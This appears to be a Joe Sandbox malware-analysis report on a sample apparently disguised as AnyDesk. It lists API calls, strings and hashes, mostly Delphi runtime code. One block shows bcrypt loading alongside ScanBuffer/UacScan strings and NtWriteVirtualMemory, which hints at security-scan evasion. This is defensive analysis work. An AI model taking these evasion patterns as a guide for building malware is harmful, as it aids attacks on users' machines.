            • API String ID: 3245196872-1565342463
            • Opcode ID: b0c095bb0bf7f1e9d1aae1e1328f68eb2124dcdd9a5bbbbb2169f4990aefa3e5
            • Instruction ID: 0b7cb04d240dfb554d813b998aa95e9f5118c1ed1e564cf7da276c3069c879e0
            • Opcode Fuzzy Hash: b0c095bb0bf7f1e9d1aae1e1328f68eb2124dcdd9a5bbbbb2169f4990aefa3e5
            • Instruction Fuzzy Hash: C8415B71D00739ABDB24DAE8CC88ADEB7BDEF09350F4445E5A59CE7242E7709A488F50
            APIs
            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25BE8
            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BF5
            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B25BFB
            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B25C26
            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25C6D
            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25C7D
            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B25CA5
            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B25CB5
            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B25CDB
            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B25CEB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
            • API String ID: 1599918012-2375825460
            • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
            • Instruction ID: 8dc248f859a430fb408fec0d2a24f57845c5ea6104e705d009ffd408c8dfb311
            • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
            • Instruction Fuzzy Hash: 8B317571E4037C2AEB39D6B89C45FDE77AD9B04380F4441E2A64CE6186E674DE8C8F91
            APIs
            • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BA73A8,02B3A587,ScanString,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,Initialize,02BA73A8,02B3A93C,UacScan), ref: 02B38960
            • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B3897A
            • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BA73A8,02B3A587,ScanString,02BA73A8,02B3A93C,ScanBuffer,02BA73A8,02B3A93C,Initialize), ref: 02B389B6
              • Part of subcall function 02B37D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37DEC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
            • String ID: BCryptVerifySignature$bcrypt
            • API String ID: 1002360270-4067648912
            • Opcode ID: 3585b368c3b0247f116304d18df68e8fde76a133f591937452795b9412b13eb2
            • Instruction ID: 4a6b554986fd7aec7b11526d40817cb57ca0d968e661c03bd8bac15f5f2b4983
            • Opcode Fuzzy Hash: 3585b368c3b0247f116304d18df68e8fde76a133f591937452795b9412b13eb2
            • Instruction Fuzzy Hash: C7F0C8B1ECD3146EE3119668AC6AF9FF7DCD740794F0249A9BD0C87150CFB01856AB51
            APIs
              • Part of subcall function 02B24F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24F2E
            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DD5E), ref: 02B3DCCB
            • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DD05
            • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DD32
            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DD3B
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: FilePath$AllocCloseCreateNameName_StringWrite
            • String ID:
            • API String ID: 3764614163-0
            • Opcode ID: 3eb52535c3509ff0cf85c6c910b36325bc12f5b139f3d8b89b923aff95a153f5
            • Instruction ID: b872fd25942091f5ca111170281ee2489da16f463b3ecc3cda2ebba0080d612f
            • Opcode Fuzzy Hash: 3eb52535c3509ff0cf85c6c910b36325bc12f5b139f3d8b89b923aff95a153f5
            • Instruction Fuzzy Hash: 6421ED71A40319BEEB11EBA4CD42FDEB7BDEB04B00F6144A1B604F75D0EBB06A048A65
            APIs
            • RtlI.N(?,?,00000000,02B3DC7E), ref: 02B3DC2C
            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B3DC7E), ref: 02B3DC42
            • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B3DC7E), ref: 02B3DC61
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Path$DeleteFileNameName_
            • String ID:
            • API String ID: 4284456518-0
            • Opcode ID: e3326fa2756e6e925606703042b8677a8d5707d277b2e80f54409fc22b144260
            • Instruction ID: 85ff16081110cb31d9767131a6c44558c36dc7c9b162b9582f4876de1a7d02fe
            • Opcode Fuzzy Hash: e3326fa2756e6e925606703042b8677a8d5707d277b2e80f54409fc22b144260
            • Instruction Fuzzy Hash: 14016275A4434A6EEB06DBA09D41FCD77BDAB44704F9144D2E200E7081EAB4AB088B24
            APIs
              • Part of subcall function 02B24F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B24F2E
            • RtlI.N(?,?,00000000,02B3DC7E), ref: 02B3DC2C
            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B3DC7E), ref: 02B3DC42
            • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B3DC7E), ref: 02B3DC61
              • Part of subcall function 02B24C60: SysFreeString.OLEAUT32(02B3F4A4), ref: 02B24C6E
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: PathString$AllocDeleteFileFreeNameName_
            • String ID:
            • API String ID: 1530111750-0
            • Opcode ID: fde314fa8e81fae998612f4f85ab2284b533527a93b5974880ef89a6bb5854ba
            • Instruction ID: b47fee13208a3d5a14acc9dc94f68469a0b6746d158a8fc4f460c1e531ce914a
            • Opcode Fuzzy Hash: fde314fa8e81fae998612f4f85ab2284b533527a93b5974880ef89a6bb5854ba
            • Instruction Fuzzy Hash: 4E01F47595020DBEDB11EBA0DD42FCDB3BDEB48700F9144E1E605E3590EA746B048E64
            APIs
            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B27FF5
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: DiskFreeSpace
            • String ID:
            • API String ID: 1705453755-0
            • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
            • Instruction ID: 43cd47514363f0e0267dde2e6a8de58086e869b14b3bfca44dd98a54a4ea7ae6
            • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
            • Instruction Fuzzy Hash: EC1100B5A00209AF9B04CF99C981DBFF7F9FFC8710B54C569A409E7250E6719A018B90
            APIs
            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A7E2
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID:
            • API String ID: 2299586839-0
            • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
            • Instruction ID: 0a5bc45ad0a84464a6d6a42a61aa4439f059a01660daaff2929659e5972d36c2
            • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
            • Instruction Fuzzy Hash: 4BE09271B0033417D311A5589C80EE6726D9B58310F0042EAA94DC7385EDA09E884AE9
            APIs
            • GetVersionExA.KERNEL32(?,02B4D106,00000000,02B4D11E), ref: 02B2B79A
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Version
            • String ID:
            • API String ID: 1889659487-0
            • Opcode ID: c0e0908de1d13b43cb1066174ea324651776ad894baebff7494fffdbb3e84bb8
            • Instruction ID: bf118515fa089df0fd021957e0360cf2fb9754c1cb726cd668afbfafe6db4d59
            • Opcode Fuzzy Hash: c0e0908de1d13b43cb1066174ea324651776ad894baebff7494fffdbb3e84bb8
            • Instruction Fuzzy Hash: C7F0B2789443129FD350DF28D481B1677E9FB487A4F008DA9EA98C7790EB38D818CF52
            APIs
            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B2BE72,00000000,02B2C08B,?,?,00000000,00000000), ref: 02B2A823
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID:
            • API String ID: 2299586839-0
            • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
            • Instruction ID: dbc4ce7e04a6d3714e0a4aae4e14bc87c4aae5ea28ffd35882467f40cdee3022
            • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
            • Instruction Fuzzy Hash: B1D05B6230D3702AA210515A2D44D775ADCCBC5761F004079B94CC6101D2048C0BD6B2
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: LocalTime
            • String ID:
            • API String ID: 481472006-0
            • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
            • Instruction ID: 03575fff07f93704ff0d6e9cac5d0f985efb9595365ae23e775b74532ca9dc52
            • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
            • Instruction Fuzzy Hash: FDA0125040493041854033180C0257431445921A20FC4878068FC402D4E91D01248093
            Memory Dump Source
            • Source File: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 843edd10fda94fe15995e29e877b0b49e4e20478cce956a803627c395e7f0f90
            • Instruction ID: 10f1ddb9a3d4326aa61ecdada740af09cdca900789dcf777f4dd720a92ae648e
            • Opcode Fuzzy Hash: 843edd10fda94fe15995e29e877b0b49e4e20478cce956a803627c395e7f0f90
            • Instruction Fuzzy Hash: 8C514E9241D3C24FC7634F7484E52D23F62BD6752874E11DAC8D09F163E61A994BDB21
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
            • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
            • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
            • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
            APIs
            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B2D29D
              • Part of subcall function 02B2D268: GetProcAddress.KERNEL32(00000000), ref: 02B2D281
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
            • API String ID: 1646373207-1918263038
            • Opcode ID: 3007e7fb1e96cc8c67bbcb1d6ef9482028db102c40754be7a10a44672539ef12
            • Instruction ID: 3b936491de65e2172321b681cc5d950b2e3e0300963469038a2a33634f3b0115
            • Opcode Fuzzy Hash: 3007e7fb1e96cc8c67bbcb1d6ef9482028db102c40754be7a10a44672539ef12
            • Instruction Fuzzy Hash: AD41EB63A8C32A5B52046A6DB40142BF79ED749B503B046DAF48C8B784DD30FC9D9EA9
            APIs
            • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B36EDE
            • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B36EEF
            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B36EFF
            • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B36F0F
            • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B36F1F
            • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B36F2F
            • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B36F3F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
            • API String ID: 667068680-2233174745
            • Opcode ID: c50f91dac33f8aa891c4d115060ed1a8387e796b399ea5412f9b58c33e52bda0
            • Instruction ID: 2c5f43d49082b2769e29cdc03a67feb11305cd1ff5ad48c24c5128cb0445a20b
            • Opcode Fuzzy Hash: c50f91dac33f8aa891c4d115060ed1a8387e796b399ea5412f9b58c33e52bda0
            • Instruction Fuzzy Hash: 16F0ACF4AC93507DBA03BB705CC1866379DB7207447001CD6B917D6952E675D4188F25
            APIs
            • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B228CE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Message
            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
            • API String ID: 2030045667-32948583
            • Opcode ID: c23bb6dbf804dfa212af208e29c2b8a1bac33dc7e20c90816ef1d6ffbfd66889
            • Instruction ID: d8ec37bf54023c472a0b0cb362f96a389033e59445ea010331ca872da9c16fed
            • Opcode Fuzzy Hash: c23bb6dbf804dfa212af208e29c2b8a1bac33dc7e20c90816ef1d6ffbfd66889
            • Instruction Fuzzy Hash: 93A1B131A043748BDB21AA2CCC84B99B6E5EB09350F1441E5ED4DEB286CB7599CECF51
            Strings
            • Unexpected Memory Leak, xrefs: 02B228C0
            • bytes: , xrefs: 02B2275D
            • , xrefs: 02B22814
            • 7, xrefs: 02B226A1
            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B22849
            • An unexpected memory leak has occurred. , xrefs: 02B22690
            • The unexpected small block leaks are:, xrefs: 02B22707
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID:
            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
            • API String ID: 0-2723507874
            • Opcode ID: 123235cb23b1358099092c9034c33894c18cbf84052cc985d46f8b39c99fb160
            • Instruction ID: cde9e5c0c948248ce887d8249eb5793d8fd1e7d713e824c759b4d00fdfd15c5a
            • Opcode Fuzzy Hash: 123235cb23b1358099092c9034c33894c18cbf84052cc985d46f8b39c99fb160
            • Instruction Fuzzy Hash: ED71B230A083B88FDF219A2CCC84BD9BAE5EB09344F1441E5D94DEB281DB758AC9CF51
            APIs
            • GetThreadLocale.KERNEL32(00000000,02B2C08B,?,?,00000000,00000000), ref: 02B2BDF6
              • Part of subcall function 02B2A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A7E2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.3368479977.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
            • Associated: 00000000.00000002.3368459409.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002BA7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9C000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.3368717343.0000000002C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2b20000_AnyDesk.jbxd
            Similarity
            • API ID: Locale$InfoThread
            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
            • API String ID: 4232894706-2493093252
